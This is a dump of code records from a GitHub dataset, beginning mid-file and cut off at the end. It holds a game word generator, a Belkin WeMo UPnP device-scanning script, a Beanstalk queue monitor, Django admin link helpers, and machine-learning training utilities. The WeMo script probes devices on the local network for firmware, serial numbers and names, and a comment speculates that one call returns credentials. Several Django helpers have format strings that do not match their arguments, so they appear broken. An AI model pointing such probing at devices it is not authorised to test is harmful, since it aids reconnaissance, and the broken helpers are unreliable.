gen_word_list(num_words=NUM_WORDS):\n \"\"\"Generate a list of words to be used by the game.\n\n Currently a placeholder.\n\n :param int num_words: The total number of words to return\n :return: Words to use.\n :rtype: list[str]\n \"\"\"\n return [str(x) for x in range(num_words)]\n\n\ndef gen_team_list(num_red_words=NUM_RED_WORDS, num_blue_words=NUM_BLUE_WORDS,\n num_white_words = NUM_WHITE_WORDS, num_black_words=NUM_BLACK_WORDS,\n random=random.Random()):\n \"\"\"Generate a list which maps words to teams.\n\n :param int num_red_words: The number of words for the red team\n :param int num_blue_words: The number of words for the blue team\n :param int num_white_words: The number of words for the white team\n :param int num_black_words: The number of words for the black team\n :return: A list of teams\n :rtype: list[TeamWord]\n \"\"\"\n output = []\n output.extend([TeamWord.RED for _ in range(num_red_words)])\n output.extend([TeamWord.BLUE for _ in range(num_blue_words)])\n output.extend([TeamWord.WHITE for _ in range(num_white_words)])\n output.extend([TeamWord.BLACK for _ in range(num_black_words)])\n\n random.shuffle(output)\n return output\n","repo_name":"khwilson/codewords","sub_path":"codewords/game_logic/word_gen.py","file_name":"word_gen.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35224983793","text":"import requests\nimport xml.etree.ElementTree as etree\n\nTIMEOUT = 5\n\n\ndef main():\n # put your target device list here:\n target_list = (\"192.168.1.1\",\n \"192.168.1.2\"\n )\n\n device_info = \"/upnp/control/deviceinfo1\"\n manuf_info = \"/upnp/control/manufacture1\"\n event_info = \"/upnp/control/basicevent1\"\n meta_info = \"/upnp/control/metainfo1\"\n\n # Some useful things\n #setup_xml=\"setup.xml\"\n #device_xml=\"deviceinfoservice.xml\"\n #event_xml=\"eventservice.xml\"\n\n #action1=\"GetDeviceInformation\"\n #action2=\"GetInformation\"\n\n wemo_port = 49153\n\n verb_device = \"GetInformation\" #GetInformation, GetDeviceInformation, GetRouterInformation can't get this one to work.\n verb_event = \"GetFriendlyName\"\n verb_meta = \"GetMetaInfo\" #GetMetaInfo, GetExtMetaInfo isn't really useful\n\n data_dev = \"\"\n data_manuf = \"\"\n data_event = \"\"\n data_meta = \"\"\n\n headers_dev = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:deviceinfo:1#\"+verb_device+\"\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_manuf = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:manufacture:1#GetManufactureData\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_event = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:basicevent:1#\"+verb_event+\"\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_meta = {\n \"Content-Type\": \"text/xml; charset=utf-8\",\n \"SOAPACTION\": \"\\\"urn:Belkin:service:metainfo:1#\" + verb_meta + \"\\\"\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": str(len(data_dev))\n }\n # GetFriendlyName just returns friendly name\n #GetSmartDevInfo was a dud. GetHomeInfo returns some base64 encoded blob. maybe creds\n\n for i in target_list:\n try:\n r_dev = requests.post(\"http://{}:{}{}\".format(i, wemo_port, device_info), headers=headers_dev, data=data_dev,\n stream=True, timeout=TIMEOUT)\n #r_man = requests.post(\"http://{}:{}{}\".format(i, wemo_port, manuf_info), headers=headers_manuf,\n # data=data_manuf, stream=True, timeout=TIMEOUT)\n #r_event = requests.post(\"http://{}:{}{}\".format(i, wemo_port, event_info), headers=headers_event,\n # data=data_event, stream=True, timeout=TIMEOUT)\n r_meta = requests.post(\"http://{}:{}{}\".format(i, wemo_port, meta_info), headers=headers_meta,\n data=data_meta, stream=True, timeout=TIMEOUT)\n\n except requests.exceptions.Timeout:\n continue\n except requests.exceptions.ConnectionError:\n continue\n parse_wemo_xml_dev(r_dev, i, verb_device)\n #parse_wemo_xml_manuf(r_man, i)\n #parse_wemo_xml_event(r_event, i)\n parse_wemo_xml_meta(r_meta, i, verb_meta)\n\ndef parse_wemo_xml_dev(resp, ip, verb):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n if verb == \"GetInformation\":\n info = info.find('{urn:Belkin:service:deviceinfo:1}GetInformationResponse')\n if info is None:\n return\n info = info.find('Information')\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_manuf(resp, ip):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n info = info.find('{urn:Belkin:service:manufacture:1}GetManufactureDataResponse')\n if info is None:\n return\n #TODO: parse this out\n info = info.find('Information')\n if info is None:\n return\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_event(resp, ip):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n info = info.find('{urn:Belkin:service:deviceinfo:1}GetInformationResponse')\n if info is None:\n return\n info = info.find('Information')\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_meta(resp, ip, verb):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n\n if verb == \"GetMetaInfo\":\n info = info.find('{urn:Belkin:service:metainfo:1}GetMetaInfoResponse')\n if info is None:\n return\n info = info.find('MetaInfo')\n meta = info.text.split('|')\n serial = meta[1]\n cat = meta[2]\n fw = meta[3]\n name = meta[4]\n type = meta[5]\n\n print(\"[*] found a {} category {} at ?.?.{} named with version {} and serial {}\".format(cat, type, \".\".join(ip.split(\".\")[-2:]), name, fw, serial))\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"bensmith83/we_go","sub_path":"we_go.py","file_name":"we_go.py","file_ext":"py","file_size_in_byte":7667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31302909931","text":"from controller.controller import Controller\nfrom pystalk import BeanstalkClient\nimport re\n\nclass from_beanstalk(Controller):\n\n final = {}\n\n def __init__(self, **kwargs):\n Controller.__init__(self,**kwargs)\n self.frombeanstalk()\n\n def frombeanstalk(self):\n try:\n result = []\n a = 0\n result.append(\"\\n--\\t*Beanstalk*\\t--\")\n while True:\n tw = re.compile('sc_twitter_')\n fb = re.compile('sc_fb_')\n ig = re.compile('sc_ig_')\n yt = re.compile('sc_youtube_')\n if a == 1:\n tube_list_fb = []\n tube_list_ig = []\n tube_list_yt = []\n client = BeanstalkClient(self.config.get('ip_beanstalk','ip_ph'),self.config.get('ip_beanstalk','port_ph'))\n list_tube = client.list_tubes()\n for b in range(list_tube.__len__()):\n if fb.findall(list_tube[b]): tube_list_fb.append(list_tube[b])\n if ig.findall(list_tube[b]): tube_list_ig.append(list_tube[b])\n if yt.findall(list_tube[b]): tube_list_yt.append(list_tube[b])\n tube_list = tube_list_fb + tube_list_ig + tube_list_yt\n for c in tube_list:\n data = client.stats_tube(c)\n if data['current-jobs-urgent'] >= 3000 or data['current-jobs-ready'] >= 3000:\n res = \"\\n*{0}*\\nworker : {1}\\njobs-urgent : {2}\\njobs-ready : {3}\\njobs-buried : {4}\\njobs-reserved: {5}\" \\\n .format(data['name'], data['current-watching'], data['current-jobs-urgent'],\n data['current-jobs-ready'], data['current-jobs-buried'], data['current-jobs-reserved'])\n result.append(res)\n else: continue\n elif a == 0 :\n tube_list = []\n client = BeanstalkClient(self.config.get('ip_beanstalk','ip_bintaro'),self.config.get('ip_beanstalk','port_bintaro'))\n list_tube = client.list_tubes()\n for b in range(list_tube.__len__()):\n if tw.findall(list_tube[b]): tube_list.append(list_tube[b])\n for c in tube_list:\n data = client.stats_tube(c)\n if data['current-jobs-urgent'] >= 3000 or data['current-jobs-ready'] >= 3000:\n res = \"\\n*{0}*\\nworker : {1}\\njobs-urgent : {2}\\njobs-ready : {3}\\njobs-buried : {4}\\njobs-reserved: {5}\" \\\n .format(data['name'], data['current-watching'], data['current-jobs-urgent'],\n data['current-jobs-ready'], data['current-jobs-buried'], data['current-jobs-reserved'])\n result.append(res)\n else: continue\n else: break\n a+=1\n if result.__len__() <= 1: result.append(\"\\nBeanstalk Safe.\")\n print (\"\\n\".join(result))\n self.final['beanstalk'] = result\n # return result\n except ValueError as e: self.final['beanstalk'] = e\n\nif __name__ == '__main__':\n from_beanstalk().final.get('beanstalk')","repo_name":"Enzila/SC_Alertbot","sub_path":"get/get_from_beanstalk.py","file_name":"get_from_beanstalk.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"43898286233","text":"from .models import *\nfrom django.utils.html import format_html\nfrom django.conf import settings\n\ndef superuser_fields(self, request, obj=None, only_superuser_fieldslist=[]): #for maiking all fields read only for non superuser staff accounts\n if request.user.is_staff:\n if request.user.is_superuser:\n return only_superuser_fieldslist\n else:\n return [f.name for f in self.model._meta.fields]\n\n\ndef seeVideoFile(self, obj): #for showings uploaded video link in the list of model instances\n try:\n if obj.videoFile:\n temp = '%s' % (settings.MEDIA_URL,obj.videoFile, \"Video\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeArticleFile(self, obj): #for showings uploaded video link in the list of model instances\n try:\n if obj.articleFile:\n temp = '%s' % (settings.MEDIA_URL,obj.articleFile, \"Article\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeArticleLink(self, obj): #for showings external article link in the list of model instances\n try:\n if obj.articleFileLink:\n temp = '%s' % (obj.articleFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeAudioVideoFile(self, obj): #for showings uploaded video link in the list of model instances\n try:\n if obj.audioVideoFile:\n temp = '%s' % (settings.MEDIA_URL,obj.audioVideoFile, \"Audio/Video\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeVideoLink(self, obj): #for showings external video link in the list of model instances\n try:\n if obj.videoFileLink:\n temp = '%s' % (obj.videoFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\ndef seeVideoLink(self, obj): #for showings external video link in the list of model instances\n try:\n if obj.videoFileLink:\n temp = '%s' % (obj.videoFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\n\ndef seeAudioVideoLink(self, obj): #for showings external video link in the list of model instances\n try:\n if obj.audioVideoFileLink:\n temp = '%s' % (obj.audioVideoFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n","repo_name":"nivedkrishnans/genesis","sub_path":"registration/adminResources.py","file_name":"adminResources.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36471432957","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\nfrom sklearn.linear_model import LinearRegression\n\nData = pd.read_csv('DataPart03.csv')\n\nX = Data.drop('Sell Price($)', axis=1)\nX=pd.get_dummies(X)\nprint(X)\nX = np.array(X)\n\nY = Data['Sell Price($)']\nY = np.array(Y)\n\nModelPredict = LinearRegression().fit(X, Y)\n\n\nOutput = 'OutputP.sav'\npickle.dump(ModelPredict, open(Output, 'wb'))\n \nLoadModel = pickle.load(open(Output, 'rb'))\nResult = LoadModel.predict([[55000,5,1,0,0]])\nprint(Result)\n\n# Pickle\n# Good for small models with few parameters.\n# Allows saving model in very little time.","repo_name":"amihos99/goalearn_task_0","sub_path":"CodePart03P.py","file_name":"CodePart03P.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1395831623","text":"import torch.utils.data as data\nimport lightning as L\nfrom lightning.pytorch.callbacks import LearningRateMonitor, ModelCheckpoint, ModelPruning\n\nfrom typing import Any, Dict, Optional, Union\nimport os\nfrom copy import copy\nfrom pathlib import Path\nPRJ_ROOT = Path(__file__).parent.parent.parent.resolve()\n\ndef train(\n model: L.LightningModule,\n dataset: data.Dataset,\n compress_params: Dict[str, Any] = dict(\n parameters_to_prune=None,\n prune_ratio=0.4,\n prune_at_epochs=[0.],\n ),\n trainer_params: Dict[str, Any] = dict(\n default_root_dir=os.path.join(PRJ_ROOT, \"configs\", \"nerv\"),\n max_epochs=150,\n log_every_n_steps=15,\n check_val_every_n_epoch=50\n ),\n loader_params: Dict[str, Any] = dict(\n batch_size=1,\n num_workers=2,\n pin_memory=True,\n drop_last=False,\n )\n): \n prune_at_epochs = sorted([int(i * trainer_params[\"max_epochs\"]) for i in compress_params[\"prune_at_epochs\"]])\n def compute_amount(epoch):\n if len(prune_at_epochs) == 1:\n if epoch == prune_at_epochs[0]:\n return compress_params[\"prune_ratio\"]\n return 0\n base_prune_ratio = compress_params[\"prune_ratio\"] ** (1 / len(prune_at_epochs))\n for i in range(len(prune_at_epochs)-1):\n if prune_at_epochs[i] <= epoch < prune_at_epochs[i+1]:\n return base_prune_ratio ** (i+2)\n return 0\n \n def prune_when(epoch):\n if epoch in prune_at_epochs:\n return True\n return False\n\n trainer = L.Trainer(\n accelerator=\"auto\",\n devices=1,\n callbacks=[\n ModelCheckpoint(mode=\"max\", monitor=\"val_psnr\"),\n LearningRateMonitor(\"epoch\"),\n ModelPruning(\n parameters_to_prune=compress_params[\"parameters_to_prune\"],\n pruning_fn=\"l1_unstructured\",\n amount=compute_amount,\n use_global_unstructured=True,\n apply_pruning=prune_when,\n )\n ],\n **trainer_params,\n )\n trainer.logger._log_graph = False # if True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # optional logging argument that we don't need\n\n # build data loaders\n train_loader = data.DataLoader(dataset, shuffle=True, **loader_params)\n val_loader = data.DataLoader(dataset, shuffle=False, **loader_params)\n\n # train the model\n L.seed_everything(42)\n trainer.fit(model, train_loader, val_loader) \n\n # load the best checkpoint\n return trainer.checkpoint_callback.best_model_path\n\ndef test(\n model: L.LightningModule,\n dataset: data.Dataset,\n weights: str,\n trainer_params: Dict[str, Any] = dict(\n default_root_dir=os.path.join(PRJ_ROOT, \"configs\", \"nerv\"),\n max_epochs=1,\n log_every_n_steps=1,\n ),\n loader_params: Dict[str, Any] = dict(\n batch_size=1,\n shuffle=False,\n num_workers=2,\n pin_memory=True,\n drop_last=False,\n )\n):\n trainer = L.Trainer(\n accelerator=\"auto\",\n devices=1,\n **trainer_params,\n )\n trainer.logger._log_graph = False # if True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # optional logging argument that we don't need\n\n val_loader = data.DataLoader(dataset, **loader_params)\n \n model = model.load_from_checkpoint(weights)\n test_result = trainer.test(model, dataloaders=val_loader, verbose=False)\n return test_result","repo_name":"minhngt62/vtl-video-compression","sub_path":"video_compression/setup/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24584637617","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\nimport matplotlib.pyplot as plt\nimport os\nimport logging\nimport json\n\n# data directory containing the raw NMIR files\nNMIR_DATA_DIR = \"data/NMIR\"\n\n# savepath for training job outputs\nOUTPUT_DIR = \"output\"\nif not os.path.exists(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n\n# Import the database for AIRACs\nAIRAC_DF = pd.read_csv('data/AIRAC_dates.csv')\nAIRAC_DF['start_date'] = pd.to_datetime(AIRAC_DF['start_date'])\nAIRAC_DF['end_date'] = pd.to_datetime(AIRAC_DF['end_date'])\n\n# Import the delay categorization for evaluation\nDELAY_CATG_DF = pd.read_csv('data/delay_categorization.csv')\n\n# Define all possible Regulation types\nREGULATION_TYPES = ['C - ATC Capacity', 'W - Weather', 'S - ATC Staffing',\n 'G - Aerodrome Capacity', 'I - ATC Ind Action',\n 'M - Airspace Management', 'O - Other', 'P - Special Event',\n 'T - ATC Equipment', 'V - Environmental Issues',\n 'E - Aerodrome Services', 'R - ATC Routeings',\n 'A - Accident/Incident', 'N - Ind Action non-ATC']\n\ndef format_raw_NMIR_df(df):\n '''Function to format the raw NMIR dataframe and keep only the important columns.\n \n Args:\n df (DataFrame): raw NMIR dataframe\n \n Returns:\n df (DataFrame): formatted NMIR dataframe\n '''\n df['ACC'] = df['TVS Id'].str[0:4] #First four letters of 'TVS Id' is considered as ACC \n df['Regulation Start Time'] = pd.to_datetime(df['Regulation Start Time'])\n df['Date'] = df['Regulation Start Time'].dt.date\n df['Datetime'] = pd.to_datetime(df['Date'])\n df['Regulation Activation Date'] = pd.to_datetime(df['Regulation Activation Date'])\n df = df.loc[df['ATFM Delay (min)']>0].reset_index(drop=True)\n\n columns_to_retain = ['ACC', 'Date', 'Datetime', 'Regulation Start Time',\n 'Regulation End Date', 'Regulation Activation Date',\n 'Regulation Duration (min)', 'Regulation Cancel Status',\n 'Regulation Cancel Date', 'Regulation Reason Name',\n 'ATFM Delay (min)', 'MP Delayed Traffic']\n df = df[columns_to_retain] \n return df\n\ndef get_airac(date):\n '''Function to get the airac cycle (1 to 13) for any date.\n \n Args:\n date (datetime object): the date for which the AIRAC cycle is required.\n \n Returns:\n airac (int): AIRAC (1 to 13) for the date.\n '''\n airac = AIRAC_DF.loc[(AIRAC_DF['start_date']<=date) & (AIRAC_DF['end_date']>date)]['AIRAC_cycle'].iloc[0]\n return airac\n\ndef get_regulation_count(day_df):\n '''Function to count the number of regulations for each type of regulation for a day.\n \n Args:\n day_df (pandas df): The dataframe from which the counts are to be made.\n \n Returns:\n reg_counts_list (list): count of each type of regulations for a day as a list\n '''\n reg_counts_list = []\n for rt in REGULATION_TYPES:\n try:\n reg_count = day_df['Regulation Reason Name'].value_counts()[rt]\n except KeyError:\n reg_count = 0\n reg_counts_list.append(reg_count)\n return reg_counts_list\n\ndef build_basic_features(day_df):\n '''Function to build a feature list for a day from the NMIR dataframe list of regulations for a day\n \n Args:\n day_df (pandas df): the dataframe containing the list of regulations (cut off by activation time ex: 6AM) for a day.\n \n Returns:\n features (list): the features for a day. \n '''\n datetime_0hrs = day_df.iloc[0]['Datetime']\n count_reg_pub = day_df.shape[0]\n avg_reg_dur_pub = day_df['Regulation Duration (min)'].mean()\n d_op_activation_counts = day_df.loc[day_df['Regulation Activation Date']>datetime_0hrs].shape[0]\n count_num_ACC_pub = len(day_df['ACC'].unique().tolist())\n weekday = day_df.loc[0]['Datetime'].dayofweek\n airac = get_airac(day_df.loc[0]['Datetime'])\n reg_counts_list = get_regulation_count(day_df)\n features = [count_reg_pub, avg_reg_dur_pub, d_op_activation_counts, count_num_ACC_pub, weekday, airac] + reg_counts_list\n return features\n\ndef build_labels(day_df):\n '''Function to build the labels for a day from the NMIR dataframe list of regulations for a day.\n \n Args:\n day_df (pandas df): The dataframe containing the list of regulations (cut off by dayEndHrs ex: 24 represnting end of the day) for a day.\n \n Returns:\n labels (list): the labels ['ATFM Delay (min)', 'MP Delayed Traffic'] for a day.\n '''\n atfm_delay = day_df['ATFM Delay (min)'].sum()\n mp_delyed_traffic = day_df['MP Delayed Traffic'].sum()\n labels = [atfm_delay, mp_delyed_traffic]\n return labels\n\ndef transform_to_daywise_basic(raw_df, pub_cut_off_hrs=6, day_end_hrs=24, encode=False):\n '''Function to transform raw NMIR dataframe into a daywise dataframe with features and labels.\n \n Args:\n raw_df (pandas df): The raw NMIR dataframe.\n \n pubCutOffHrs (int): This number represents the hours (0 to 24) which is used to seperate a days'\n list of regulations as a snapshot to build the features. This is based on the 'activation time' column.\n \n dayEndHrs (int): This number represents the target time hour (0 to 24) which is used as target delays as labels for the day.\n \n Returns:\n daywise_df: A daywise dataframe with features and lables\n '''\n raw_df = raw_df.reset_index(drop=True)\n raw_df = format_raw_NMIR_df(raw_df)\n dates = raw_df.groupby(by ='Date',as_index=False).sum()['Date'].tolist() # get a list of all available dates in the df\n \n daywise_rowdata_list = []\n for d in dates:\n day_df = raw_df.loc[raw_df['Date']==d].reset_index(drop=True)\n day_begin_time = pd.to_datetime(d) # convert date to datetime to get 00:00 hrs time-stamp\n reg_cut_off_time = day_begin_time + dt.timedelta(hours=pub_cut_off_hrs)\n day_end_time = day_begin_time + dt.timedelta(hours=24)\n \n # select only regulations activated from the start of the day until the cutoff time\n day_df = day_df.loc[day_df['Regulation Activation Date']<=reg_cut_off_time].reset_index(drop=True)\n \n # build features from the filtered daily regulations list\n day_features = build_basic_features(day_df)\n day_labels = build_labels(day_df.loc[day_df['Regulation Start Time']<=day_end_time])\n daywise_rowdata_list.append([d] + day_features + day_labels)\n header = ['Date', 'CountRegPub', 'AvgRegDurPub', 'DopActivationCounts','CountNumACCPub',\n 'WeekDay', 'AIRAC'] + REGULATION_TYPES + ['ATFM Delay (min)', 'MP Delayed Traffic']\n return pd.DataFrame(daywise_rowdata_list, columns=header)\n \ndef get_MAPE(y_act, y_pred):\n '''Function to calculate the Mean Absolute Percentage Error (MAPE).\n MAPE = (|y_act-y_pred| * 100) / y_act\n \n Args:\n y_act (1D numpy array): actual values.\n \n y_pred (1D numpy array): predicted values.\n \n Returns:\n MAPE (float): Mean Absolute Error Percentage\n '''\n abs_per_err = np.abs(y_pred-y_act) *100 / y_act \n mape = abs_per_err.mean()\n return mape\n\ndef print_metrics(y_act_train, y_pred_train, y_act_test, y_pred_test, target):\n print('-----' + 'Results: ' + target + '-----')\n print('------Training Metrics------')\n print('R_squared:', r2_score(y_act_train, y_pred_train))\n print('Error % (abs):', get_MAPE(y_act_train, y_pred_train))\n print('MAE:', mean_absolute_error(y_act_train, y_pred_train))\n print('RMSE:', np.sqrt(mean_squared_error(y_act_train, y_pred_train)))\n print('------Testing Metrics------')\n print('R_squared:', r2_score(y_act_test, y_pred_test))\n print('Error % (abs):', get_MAPE(y_act_test, y_pred_test))\n print('MAE:', mean_absolute_error(y_act_test, y_pred_test))\n print('RMSE:', np.sqrt(mean_squared_error(y_act_test, y_pred_test)))\n\ndef save_metrics_detailed(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n columns = ['category', 'train_days', 'test_days', 'train_MAPE', 'test_MAPE', 'train_R2', 'test_R2', 'train_RMSE', 'test_RMSE']\n data = []\n categories_list = DELAY_CATG_DF['category'].to_list()\n for category in categories_list:\n if target==\"delay\":\n lower_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delay_low'].item()\n upper_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delay_high'].item()\n else:\n lower_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delayed_traffic_low'].item()\n upper_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delayed_traffic_high'].item()\n if np.isnan(upper_bound):\n upper_bound = np.inf\n y_act_train_catg = y_act_train[(y_act_train >= lower_bound) & (y_act_train < upper_bound)]\n y_pred_train_catg = y_pred_train[(y_act_train >= lower_bound) & (y_act_train < upper_bound)]\n y_act_test_catg = y_act_test[(y_act_test >= lower_bound) & (y_act_test < upper_bound)]\n y_pred_test_catg = y_pred_test[(y_act_test >= lower_bound) & (y_act_test < upper_bound)]\n train_days = y_act_train_catg.shape[0]\n test_days = y_act_test_catg.shape[0]\n train_MAPE = get_MAPE(y_act_train_catg, y_pred_train_catg)\n test_MAPE = get_MAPE(y_act_test_catg, y_pred_test_catg)\n train_R2 = r2_score(y_act_train_catg, y_pred_train_catg)\n test_R2 = r2_score(y_act_test_catg, y_pred_test_catg)\n train_RMSE = np.sqrt(mean_squared_error(y_act_train_catg, y_pred_train_catg))\n test_RMSE = np.sqrt(mean_squared_error(y_act_test_catg, y_pred_test_catg))\n data.append([category, train_days, test_days, round(train_MAPE, 2), round(test_MAPE, 2),\n round(train_R2, 2), round(test_R2, 2),\n round(train_RMSE, 2), round(test_RMSE, 2)])\n metrics_df = pd.DataFrame(data, columns=columns)\n metrics_df.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"metrics.csv\"), index=False)\n\ndef save_line_plots(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n fig, ax = plt.subplots(2, 1, sharex = False, figsize=(15,8))\n fig.subplots_adjust(hspace=.4)\n ax[0].plot(range(0, len(y_act_train), 1), y_act_train, range(0, len(y_act_train), 1), y_pred_train)\n ax[0].set_title('Training set results: ' + target)\n ax[0].legend(['Actual','Prediction'])\n ax[0].set_xlabel('days (unordered)')\n ax[1].plot(range(0, len(y_act_test), 1), y_act_test, range(0, len(y_act_test), 1), y_pred_test)\n ax[1].set_title('Testing set results: ' + target)\n ax[1].legend(['Actual','Prediction'])\n ax[1].set_xlabel('days (unordered)')\n if target == 'delay':\n ax[0].set_ylabel('delay (min)')\n ax[1].set_ylabel('delay (min)')\n else:\n ax[0].set_ylabel('delayed traffic (flights)')\n ax[1].set_ylabel('delayed traffic (flights)')\n plt.savefig(os.path.join(OUTPUT_DIR, job_dir, \"lineplot.png\"), bbox_inches='tight')\n\ndef save_scatter_plots(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n fig, ax = plt.subplots(2, 1, sharex = True, figsize=(8,8))\n fig.subplots_adjust(hspace=.3)\n max_value = np.max(np.concatenate((y_act_train, y_pred_train, y_act_test, y_pred_test), axis=0))\n scatter_limit = int(max_value + 0.1 * max_value)\n ax[0].plot(range(0, scatter_limit, 1),range(0, scatter_limit, 1), color='red')\n ax[0].scatter(y_act_train, y_pred_train, alpha=0.5)\n ax[0].set_title('Training set results: ' + target)\n ax[0].legend(['Target','Prediction'])\n ax[0].set_xlabel('actual delay (min)')\n ax[1].plot(range(0, scatter_limit, 1),range(0, scatter_limit, 1), color='red')\n ax[1].scatter(y_act_test, y_pred_test, alpha=0.5)\n ax[1].set_title('Testing set results: ' + target)\n ax[1].legend(['Target','Prediction'])\n ax[1].set_xlabel('actual delay (min)')\n if target == 'delay':\n ax[0].set_ylabel('predicted delay (min)')\n ax[1].set_ylabel('predicted delay (min)')\n else:\n ax[0].set_ylabel(' predicted delayed traffic (flights)')\n ax[1].set_ylabel('predicted delayed traffic (flights)')\n plt.savefig(os.path.join(OUTPUT_DIR, job_dir, \"scatterplot.png\"), bbox_inches='tight')\n\ndef save_predictions(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n header = ['actual', 'prediction']\n y_act_train = np.array(y_act_train).reshape(-1,1)\n y_pred_train = np.array(y_pred_train).reshape(-1,1)\n y_act_test = np.array(y_act_test).reshape(-1,1)\n y_pred_test = np.array(y_pred_test).reshape(-1,1)\n train_result = pd.DataFrame(np.concatenate((y_act_train, y_pred_train), axis=1), columns = header)\n test_result = pd.DataFrame(np.concatenate((y_act_test, y_pred_test), axis=1), columns = header)\n train_result.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"train_results.csv\"))\n test_result.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"test_results.csv\"))\n\ndef register_job_log(job_dir, y_train, y_pred_train, y_test, y_pred_test):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(message)s\")\n file_handler = logging.FileHandler(os.path.join(OUTPUT_DIR, 'jobs_registry.log'))\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n train_MAPE = get_MAPE(y_train, y_pred_train)\n train_MAPE = str(round(train_MAPE, 2))\n test_MAPE = get_MAPE(y_test, y_pred_test)\n test_MAPE = str(round(test_MAPE, 2))\n log_msg = job_dir + \" :: \" + \"train_MAPE\" + \" :: \" + train_MAPE + \" :: \" + \"test_MAPE\" + \" :: \" + test_MAPE\n logger.info(log_msg)\n\ndef create_job_dir(job_dir):\n if not os.path.exists(os.path.join(OUTPUT_DIR, job_dir)):\n os.makedirs(os.path.join(OUTPUT_DIR, job_dir))\n\ndef save_training_file_info(train_filenames, job_dir):\n filename = os.path.join(OUTPUT_DIR, job_dir, 'training_files_info.json')\n with open(filename, 'w') as filehandler:\n json.dump({'training_files_used': train_filenames}, filehandler)","repo_name":"brianpinto91/atfm-delay-prediction","sub_path":"training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74806545446","text":"from django.shortcuts import render, 